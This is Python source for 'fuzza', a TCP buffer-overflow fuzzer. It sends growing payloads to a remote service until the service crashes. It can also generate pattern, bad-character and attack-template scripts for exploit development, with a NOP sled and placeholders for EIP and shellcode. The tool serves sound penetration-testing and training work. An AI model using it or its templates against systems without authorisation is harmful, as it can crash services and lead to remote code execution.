#!/usr/bin/env python
"""Customizable TCP fuzzer."""

from __future__ import print_function

import re
import os
import sys
import argparse
import socket
from time import sleep


# -------------------------------------------------------------------------------------------------
# GLOBALS
# -------------------------------------------------------------------------------------------------

CHAR = "A"  # Default character the fuzzing buffer is built from (-c/--char)
PREFIX = ""  # Default string prepended to every payload (-p/--prefix)
SUFFIX = ""  # Default string appended to every payload (-s/--suffix)
INIT_MULTIPLIER = 100  # Default initial buffer length in characters (-l/--length)
ROUND_MULTIPLIER = 100  # Default number of characters added per round (-m/--multiply)
TIMEOUT = 30.0  # Default receive timeout in seconds (-t/--timeout)
DELAY = 1.0  # Default pause in seconds between fuzzing rounds (-d/--delay)


# -------------------------------------------------------------------------------------------------
# HELPER FUNCTIONS
# -------------------------------------------------------------------------------------------------


def b2str(data):
    """Convert bytes into string type.

    ``data`` is decoded as UTF-8, falling back to latin-1 when that fails.
    latin-1 maps every byte value to a code point, so the fallback never raises
    and no received byte is lost.

    :param data: raw bytes, e.g. as returned by ``socket.recv``.
    :return: the decoded text.
    """
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        # Trying "utf-8-sig" or "ascii" here would be pointless: both accept only
        # a subset of valid UTF-8 and therefore fail on this same input.
        return data.decode("latin-1")


def print_crashlog(prefix, suffix, char, buff):
    """Report that the remote service stopped responding.

    Prints how many ``char`` characters ``buff`` held, followed by the complete
    payload (``prefix + buff + suffix``) that was last sent.
    """
    crashed_at = len(buff)
    print('\nRemote service (most likely) crashed at %s bytes of "%s"' % (crashed_at, char))
    print("Payload sent:\n%s" % (prefix + buff + suffix))


# -------------------------------------------------------------------------------------------------
# GENERATE FUNCTIONS
# -------------------------------------------------------------------------------------------------


def _script_pattern(host, port, prefix, suffix, init, exit):
    """Generate pattern overflow triaging scripts.

    Returns the source of a Python script that connects to ``host``:``port``,
    replays the ``init`` conversation, sends ``prefix + pattern + suffix``
    (``pattern`` is left empty for the output of pattern_create.rb), replays
    the ``exit`` conversation and prints 'done'.

    :param host: remote address written into the script.
    :param port: remote port written into the script.
    :param prefix: string prepended to the pattern.
    :param suffix: string appended to the pattern.
    :param init: ``'<send>:<expect>,...'`` spec sent before the payload, or None.
    :param exit: ``'<send>:<expect>,...'`` spec sent after the payload, or None.
    :return: the generated script as a string.
    """

    def _comms(spec):
        """Turn a '<send>:<expect>,...' spec into s.send()/s.recv() lines."""
        code = ""
        if spec is None:
            return code
        for comm in spec.split(","):
            # Split on the first ':' only so that <expect> may itself contain ':'.
            d_send, d_expect = comm.split(":", 1)
            if d_send:
                # {!r} emits a correctly escaped literal, so quotes or backslashes
                # in user input cannot break the generated script.
                code += "    s.send({!r} + '\\r\\n')\n".format(d_send)
            if d_expect:
                # The generated script only drains the reply; it does not match it.
                code += "    s.recv(1024)\n"
        return code

    code_head = '''#!/usr/bin/env python
"""fuzza autogenerated."""

from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

pattern = ""     # Add output from pattern_create.rb

try:
    print('Sending buffer...')
    s.connect(({!r}, {}))
'''.format(
        host, port
    )

    payload = "    s.send({!r} + pattern + {!r} + '\\r\\n')\n".format(prefix, suffix)

    code_tail = """    print('done')
except:
    print('Could not connect')
"""
    return code_head + _comms(init) + payload + _comms(exit) + code_tail


def _script_badchars(host, port, char, prefix, suffix, length, init, exit):
    """Generate badchar overflow triaging scripts.

    Returns the source of a Python script that connects to ``host``:``port``,
    replays the ``init`` conversation, sends
    ``prefix + char*len_overflow + eip + badchars + suffix`` (badchars being
    every byte value 0x01-0xff), replays the ``exit`` conversation and prints
    'done'.

    :param host: remote address written into the script.
    :param port: remote port written into the script.
    :param char: filler character repeated up to the overflow offset.
    :param prefix: string prepended to the buffer.
    :param suffix: string appended to the buffer.
    :param length: crash length; written as ``len_total``, with
                   ``len_overflow`` pre-set to ``length - 30``.
    :param init: ``'<send>:<expect>,...'`` spec sent before the payload, or None.
    :param exit: ``'<send>:<expect>,...'`` spec sent after the payload, or None.
    :return: the generated script as a string.
    """

    def _comms(spec):
        """Turn a '<send>:<expect>,...' spec into s.send()/s.recv() lines."""
        code = ""
        if spec is None:
            return code
        for comm in spec.split(","):
            # Split on the first ':' only so that <expect> may itself contain ':'.
            d_send, d_expect = comm.split(":", 1)
            if d_send:
                # {!r} emits a correctly escaped literal, so quotes or backslashes
                # in user input cannot break the generated script.
                code += "    s.send({!r} + '\\r\\n')\n".format(d_send)
            if d_expect:
                # The generated script only drains the reply; it does not match it.
                code += "    s.recv(1024)\n"
        return code

    code_head = '''#!/usr/bin/env python
"""fuzza autogenerated."""

from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

len_total    = {}      # Start at len_overflow and try out how much can be overwritten
len_overflow = {}      # Use pattern_create.rb and pattern_offset.rb to find exact offset
eip          = "B"*4     # Ignore for badchar detection
badchars = (
  "\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10"
  "\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20"
  "\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30"
  "\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40"
  "\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50"
  "\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60"
  "\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70"
  "\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80"
  "\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90"
  "\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0"
  "\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0"
  "\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0"
  "\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0"
  "\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0"
  "\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0"
  "\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff"
)

buffer = {!r}*len_overflow + eip + badchars

try:
    print('Sending buffer...')
    s.connect(({!r}, {}))
'''.format(
        length, length - 30, char, host, port
    )

    payload = "    s.send({!r} + buffer + {!r} + '\\r\\n')\n".format(prefix, suffix)

    code_tail = """    print('done')
except:
    print('Could not connect')
"""
    return code_head + _comms(init) + payload + _comms(exit) + code_tail


def _script_attack(host, port, char, prefix, suffix, length, init, exit):
    """Generate attack overflow triaging scripts.

    Returns the source of a Python script that connects to ``host``:``port``,
    replays the ``init`` conversation, sends
    ``prefix + char*len_overflow + eip + NOP sled + shellcode + padding + suffix``,
    replays the ``exit`` conversation and prints 'done'. ``eip`` and
    ``shellcode`` are placeholders for the user to fill in.

    :param host: remote address written into the script.
    :param port: remote port written into the script.
    :param char: filler character repeated up to the overflow offset.
    :param prefix: string prepended to the buffer.
    :param suffix: string appended to the buffer.
    :param length: crash length; written as ``len_total``, with
                   ``len_overflow`` pre-set to ``length - 30``.
    :param init: ``'<send>:<expect>,...'`` spec sent before the payload, or None.
    :param exit: ``'<send>:<expect>,...'`` spec sent after the payload, or None.
    :return: the generated script as a string.
    """

    def _comms(spec):
        """Turn a '<send>:<expect>,...' spec into s.send()/s.recv() lines."""
        code = ""
        if spec is None:
            return code
        for comm in spec.split(","):
            # Split on the first ':' only so that <expect> may itself contain ':'.
            d_send, d_expect = comm.split(":", 1)
            if d_send:
                # {!r} emits a correctly escaped literal, so quotes or backslashes
                # in user input cannot break the generated script.
                code += "    s.send({!r} + '\\r\\n')\n".format(d_send)
            if d_expect:
                # The generated script only drains the reply; it does not match it.
                code += "    s.recv(1024)\n"
        return code

    code_head = '''#!/usr/bin/env python
"""fuzza autogenerated."""

from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

len_total    = {}               # Start at len_overflow and try out how much can be overwritten
len_overflow = {}               # Use pattern_create.rb and pattern_offset.rb to find exact offset
len_nop_sled = 16                 # Add nops if you need to encode your shellcode
eip          = "\\x90\\x90\\x90\\x90" # Change this (Keep in mind to put address in reverse order)
shellcode    = ""

padding = "C"*(len_total - len_overflow - len(str(eip)) - len_nop_sled - len(shellcode))
buffer  = {!r}*len_overflow + eip + "\\x90"*len_nop_sled + shellcode + padding

try:
    print('Sending buffer...')
    s.connect(({!r}, {}))
'''.format(
        length, length - 30, char, host, port
    )

    payload = "    s.send({!r} + buffer + {!r} + '\\r\\n')\n".format(prefix, suffix)

    code_tail = """    print('done')
except:
    print('Could not connect')
"""
    return code_head + _comms(init) + payload + _comms(exit) + code_tail


def generate(directory, host, port, char, prefix, suffix, length, init, exit):
    """Generate overflow triaging scripts.

    Writes ``attack.py``, ``pattern.py`` and ``badchars.py`` into ``directory``,
    overwriting files of the same name. All three sources are built before any
    file is written.

    :param directory: existing directory to write the scripts into.
    :param host: remote address written into the scripts.
    :param port: remote port written into the scripts.
    :param char: filler character used by the attack/badchars scripts.
    :param prefix: string prepended to every payload.
    :param suffix: string appended to every payload.
    :param length: crash length used to pre-populate the scripts.
    :param init: ``'<send>:<expect>,...'`` spec sent before the payload, or None.
    :param exit: ``'<send>:<expect>,...'`` spec sent after the payload, or None.
    """
    scripts = (
        ("attack.py", _script_attack(host, port, char, prefix, suffix, length, init, exit)),
        ("pattern.py", _script_pattern(host, port, prefix, suffix, init, exit)),
        ("badchars.py", _script_badchars(host, port, char, prefix, suffix, length, init, exit)),
    )
    for filename, source in scripts:
        # "with" closes the file even if the write fails part-way.
        with open(os.path.join(directory, filename), "w") as fp:
            fp.write(source)


# -------------------------------------------------------------------------------------------------
# NETWORK FUNCTIONS
# -------------------------------------------------------------------------------------------------


def connect(host, port):
    """Open an IPv4 TCP connection to ``host``:``port``.

    :return: ``(socket, None)`` on success, otherwise ``(None, error)``. Once the
             socket object exists, it is closed before any error is returned.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except socket.error as err:
        return (None, err)

    def _give_up(err):
        # Release the half-set-up socket and report why.
        sock.close()
        return (None, err)

    try:
        address = socket.gethostbyname(host)
    except socket.gaierror as err:
        return _give_up(err)

    try:
        sock.connect((address, port))
    except socket.error as err:
        return _give_up(err)

    return (sock, None)


def send(s, data):
    """Send ``data`` followed by CRLF to socket ``s``.

    Text is encoded as UTF-8; byte strings are sent unchanged. The whole line is
    transmitted with ``sendall`` so large fuzzing payloads are not truncated by a
    partial ``send``. On failure the socket is closed.

    :param s: connected socket.
    :param data: line to send, without line terminator.
    :return: ``(True, None)`` on success, ``(False, error)`` on socket error.
    """
    if isinstance(data, bytes):
        line = data + b"\r\n"
    else:
        # Sockets only accept bytes; mixing bytes and str raises TypeError on Python 3.
        line = (data + "\r\n").encode("utf-8")
    try:
        s.sendall(line)
    except socket.error as msg:
        s.close()
        return (False, msg)

    return (True, None)


def receive(s, timeout, bufsize=1024):
    """Read one newline terminated line from a connected socket.

    Chunks of up to ``bufsize`` bytes are read until the accumulated data ends in
    ``\\n`` or ``\\r``, or until a ``recv`` returns no data (peer closed). The
    raw bytes are decoded once at the end, so multi-byte UTF-8 sequences that
    straddle a chunk boundary are not mangled.

    NOTE(review): a reply without a trailing newline is only returned once the
    peer closes; otherwise the next ``recv`` waits ``timeout`` seconds and the
    call fails.

    :param s: connected socket.
    :param timeout: seconds each ``recv`` may block.
    :param bufsize: maximum bytes per ``recv`` call.
    :return: ``(True, text)`` with trailing CR/LF characters stripped, or
             ``(False, error)`` on socket error/timeout or when the peer closed
             before sending anything.
    """
    raw = b""
    s.settimeout(timeout)

    while True:
        try:
            chunk = s.recv(bufsize)
        except socket.error as err:
            return (False, err)
        if not chunk:
            # recv() returned nothing: the peer has closed the connection.
            if not raw:
                return (False, "upstream connection is gone while receiving")
            # Sometimes a newline is missing at the end; take what arrived.
            break
        raw += chunk
        # Newline terminates the read request
        if raw.endswith((b"\n", b"\r")):
            break
    # rstrip() with a character set removes every trailing CR and LF.
    return (True, b2str(raw).rstrip("\r\n"))


# -------------------------------------------------------------------------------------------------
# ARGS
# -------------------------------------------------------------------------------------------------


def _args_check_dir(value):
    """Argparse type: accept ``value`` only if it names an existing directory.

    Returns ``value`` unchanged; raises ``argparse.ArgumentTypeError`` otherwise.
    """
    if os.path.isdir(str(value)):
        return value
    raise argparse.ArgumentTypeError('Directory "%s" does not exist.' % value)


def _args_check_init(value):
    """Argparse type for -i/-e: every comma-separated item must contain ':'.

    Returns ``value`` unchanged; raises ``argparse.ArgumentTypeError`` otherwise.
    """
    separated = [":" in item for item in value.split(",")]
    if not all(separated):
        raise argparse.ArgumentTypeError('"%s" is an invalid init value.' % value)
    return value


def _args_check_port(value):
    """Argparse type: convert ``value`` to an integer TCP port in 1..65535.

    Raises ``argparse.ArgumentTypeError`` for non-numeric or out-of-range input.
    """
    lowest, highest = 1, 65535
    invalid = argparse.ArgumentTypeError('"%s" is an invalid port number.' % value)

    try:
        port = int(value)
    except ValueError:
        raise invalid

    if not lowest <= port <= highest:
        raise invalid
    return port


def get_args(argv=None):
    """Retrieve command line arguments.

    :param argv: argument list to parse; ``None`` (the default) parses
                 ``sys.argv[1:]``, as argparse always does.
    :return: the populated ``argparse.Namespace``.
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        description="Customizable TCP fuzzing tool to test for remote buffer overflows.",
        epilog="""\
example:

  The following example illustrates how to use the initial communication by:
      1. Expecting the POP3 server banner
      2. Sending 'USER bob'
      3. Expecting a welcome message
  Additionally, the fuzzing characters are prefixed with 'PASS ' so that the
  actual fuzzing is done on the password:
     1. Prefix payload with 'PASS '
     2. Send payload
  Lastly, the '-e' option (which works exactly like '-i') is used to send data
  after the payload in order to close the connection:
     1. Expect any response from password payload
     2. Terminate the connection via QUIT
     3. Do not expect a follow up response

     $ fuzza -i ':.*POP3.*,USER bob:.*welcome.*' -e ':.*,QUIT:' -p 'PASS ' 10.0.0.1 110
""",
    )
    parser.add_argument(
        "-v",
        "--version",
        action="version",
        version="%(prog)s 0.4.0 by cytopia",
        help="Show version information.",
    )
    parser.add_argument(
        "-c",
        "--char",
        metavar="char",
        required=False,
        default=CHAR,
        type=str,
        help='Buffer character to send as payload. Default: "' + CHAR + '"',
    )
    parser.add_argument(
        "-p",
        "--prefix",
        metavar="str",
        required=False,
        default=PREFIX,
        type=str,
        help="Prefix string to prepend to buffer. Empty by default.",
    )
    parser.add_argument(
        "-s",
        "--suffix",
        metavar="str",
        required=False,
        default=SUFFIX,
        type=str,
        help="Suffix string to append to buffer. Empty by default.",
    )
    parser.add_argument(
        "-l",
        "--length",
        metavar="int",
        required=False,
        default=INIT_MULTIPLIER,
        type=int,
        help="""Initial length to concat buffer string with x*char.
When using the '-g' option to generate reproducible attack scripts set this to the
value at which the crash occurred in order to pre-populate the generated scripts.
"""
        + "Default: "
        + str(INIT_MULTIPLIER),
    )
    parser.add_argument(
        "-m",
        "--multiply",
        metavar="int",
        required=False,
        default=ROUND_MULTIPLIER,
        type=int,
        help="Round multiplier to concat buffer string with x*char every round. Default: "
        + str(ROUND_MULTIPLIER),
    )
    parser.add_argument(
        "-i",
        "--init",
        metavar="str",
        required=False,
        default=None,
        type=_args_check_init,
        help="""If specified, initializes communication before sending the payload in the form
'<send>:<expect>,<send>:<expect>,...'. Where <send> is the data to be sent
to the server and <expect> is the answer to be received from the server.
Either one of <send> or <expect> can be omitted if you expect something without
having sent data yet or need to send something for which there will not be an
answer. Multiple <send>:<expect> are supported and must be separated by a comma.
Regex supported for <expect> part.""",
    )
    parser.add_argument(
        "-e",
        "--exit",
        metavar="str",
        required=False,
        default=None,
        type=_args_check_init,
        help="""If specified, finalizes communication after sending the payload in the form
'<send>:<expect>,<send>:<expect>,...'. Where <send> is the data to be sent
to the server and <expect> is the answer to be received from the server.
Either one of <send> or <expect> can be omitted if you expect something without
having sent data yet or need to send something for which there will not be an
answer. Multiple <send>:<expect> are supported and must be separated by a comma.
Regex supported for <expect> part.""",
    )
    parser.add_argument(
        "-t",
        "--timeout",
        metavar="float",
        required=False,
        default=TIMEOUT,
        type=float,
        help="""Timeout in seconds for receiving data before declaring
the endpoint as crashed. Default: """
        + str(TIMEOUT),
    )
    parser.add_argument(
        "-d",
        "--delay",
        metavar="float",
        required=False,
        default=DELAY,
        type=float,
        help="Delay in seconds between each round. Default: " + str(DELAY),
    )
    parser.add_argument(
        "-g",
        "--generate",
        metavar="dir",
        required=False,
        default=None,
        type=_args_check_dir,
        help="""Generate custom python scripts based on your command line arguments
to reproduce and triage the overflow. Requires a directory to be specified where to
save the scripts to.""",
    )
    parser.add_argument("host", type=str, help="address to connect to.")
    parser.add_argument("port", type=_args_check_port, help="port to connect to.")
    return parser.parse_args(argv)


# -------------------------------------------------------------------------------------------------
# MAIN ENTRYPOINT
# -------------------------------------------------------------------------------------------------


def _expect_matches(expect, received):
    """Return True if ``received`` equals ``expect`` or matches it as a regex.

    An ``expect`` that is not a valid regular expression (e.g. '+OK') is only
    compared literally, instead of aborting the fuzzer with ``re.error``.
    """
    if expect == received:
        return True
    try:
        return bool(re.search(expect, received))
    except re.error:
        return False


def _converse(s, spec, label, timeout):
    """Replay a '<send>:<expect>,...' conversation on socket ``s``.

    Progress is printed as '<label> Sending:', '<label> Awaiting:' and
    '<label> Received:' lines.

    :return: ``("ok", None)`` when every step succeeded (or ``spec`` is None),
             ``("error", err)`` when sending or receiving failed, or
             ``("mismatch", message)`` when a reply did not match its <expect>.
    """
    if spec is None:
        return ("ok", None)
    for comm in spec.split(","):
        # Only the first ':' separates <send> from <expect>, so the <expect>
        # part (a regex) may itself contain ':'.
        d_send, d_expect = comm.split(":", 1)
        # Send data?
        if d_send:
            print("%s Sending:  %s" % (label, d_send))
            succ, err = send(s, d_send)
            if not succ:
                return ("error", err)
        # Expect data?
        if d_expect:
            print("%s Awaiting: %s" % (label, d_expect))
            succ, d_recv = receive(s, timeout, 1024)
            if not succ:
                return ("error", d_recv)
            print("%s Received: %s" % (label, d_recv))
            if not _expect_matches(d_expect, d_recv):
                return ("mismatch", 'Expected "%s", received "%s"' % (d_expect, d_recv))
    return ("ok", None)


def main():
    """Start the program.

    With ``-g`` the triage scripts are written and the program returns.
    Otherwise every round opens a new connection, replays the init
    conversation, sends ``prefix + char*n + suffix``, replays the exit
    conversation and grows ``n`` by ``--multiply``. A failure in the first
    round is a setup error (exit status 1); a later failure is reported as a
    crash caused by the last payload sent (exit status 0).
    """
    args = get_args()

    char = args.char
    imulti = args.length
    rmulti = args.multiply
    prefix = args.prefix
    suffix = args.suffix
    timeout = args.timeout
    delay = args.delay
    gen = args.generate

    multiplier = imulti
    # Body of the last payload sent; this is what a crash report shows.
    buff = char * multiplier

    # Generate triage scripts
    if gen:
        generate(gen, args.host, args.port, char, prefix, suffix, args.length, args.init, args.exit)
        return

    def _crashed():
        """Report the last payload as the cause of the crash and exit."""
        print_crashlog(prefix, suffix, char, buff)
        sys.exit(0)

    def _fail(err):
        """Abort: in the first round nothing was fuzzed yet, so it is a setup error."""
        if multiplier == imulti:
            print(err, file=sys.stderr)
            sys.exit(1)
        _crashed()

    # Fuzz
    while True:
        print("------------------------------------------------------------")
        print("%s * %s" % (char, str(multiplier)))
        print("------------------------------------------------------------")

        # Connect
        s, err = connect(args.host, args.port)
        if s is None:
            _fail(err)

        # Initial communication. It precedes this round's payload, so a failure
        # here (including a reply mismatch) is blamed on the previous round's
        # payload, which is still held in buff.
        status, detail = _converse(s, args.init, "Init", timeout)
        if status != "ok":
            _fail(detail)

        # Send payload
        print('Sending "%s" + "%s"*%s + "%s"' % (prefix, char, multiplier, suffix))
        buff = char * multiplier
        succ, err = send(s, prefix + buff + suffix)
        if not succ:
            _fail(err)

        # Exit communication
        status, detail = _converse(s, args.exit, "Exit", timeout)
        if status == "error":
            _fail(detail)
        if status == "mismatch":
            # This round's payload was already sent, so report it as a crash.
            _crashed()

        s.close()
        sleep(delay)
        multiplier = multiplier + rmulti


if __name__ == "__main__":
    # Catch Ctrl+c and exit without error message:
    # print() ends the current output line, then exit with status 1.
    try:
        main()
    except KeyboardInterrupt:
        print()
        sys.exit(1)
